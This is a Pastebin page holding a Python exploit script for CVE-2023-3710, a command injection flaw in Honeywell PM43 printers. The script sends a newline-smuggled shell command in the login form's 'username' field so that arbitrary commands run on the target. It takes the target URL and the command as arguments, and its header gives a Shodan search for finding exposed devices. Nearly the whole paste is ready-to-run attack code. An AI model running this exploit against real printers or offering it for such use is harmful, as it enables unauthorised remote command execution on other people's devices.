Advertisement
FlyFar

Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) - CVE-2023-3710

Mar 14th, 2024
796
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.94 KB | Cybersecurity | 0 0
  1. #- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
  2. #- Shodan Dork: http.title:PM43 , PM43
  3. #- Exploit Author: ByteHunter
  4. #- Email: 0xByteHunter@proton.me
  5. #- Frimware Version: versions prior to P10.19.050004
  6. #- Tested on: P10.17.019667
  7. #- CVE : CVE-2023-3710
  8.  
  9.  
  10. import requests
  11. import argparse
  12.  
  13. BLUE = '\033[94m'
  14. YELLOW = '\033[93m'
  15. RESET = '\033[0m'
  16.  
  17. def banner():
  18.     banner = """
  19.    ╔════════════════════════════════════════════════╗
  20.        CVE-2023-3710  
  21.        Command Injection in Honeywell PM43 Printers
  22.        Author: ByteHunter      
  23.    ╚════════════════════════════════════════════════╝
  24.    """
  25.     print(YELLOW + banner + RESET)
  26.  
  27.  
  28. def run_command(url, command):
  29.     full_url = f"{url}/loadfile.lp?pageid=Configure"
  30.     payload = {
  31.         'username': f'hunt\n{command}\n',
  32.         'userpassword': 'admin12345admin!!'
  33.     }
  34.     try:
  35.         response = requests.post(full_url, data=payload, verify=False)
  36.         response_text = response.text
  37.         html_start_index = response_text.find('<html>')
  38.         if html_start_index != -1:
  39.             return response_text[:html_start_index]
  40.         else:
  41.             return response_text  
  42.     except requests.exceptions.RequestException as e:
  43.         return f"Error: {e}"
  44.  
  45. def main():
  46.     parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
  47.     parser.add_argument('--url', dest='url', help='Target URL', required=True)
  48.     parser.add_argument('--run', dest='command', help='Command to execute', required=True)
  49.  
  50.     args = parser.parse_args()
  51.  
  52.     response = run_command(args.url, args.command)
  53.     print(f"{BLUE}{response}{RESET}")
  54.  
  55. if __name__ == "__main__":
  56.     banner()
  57.     main()
  58.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement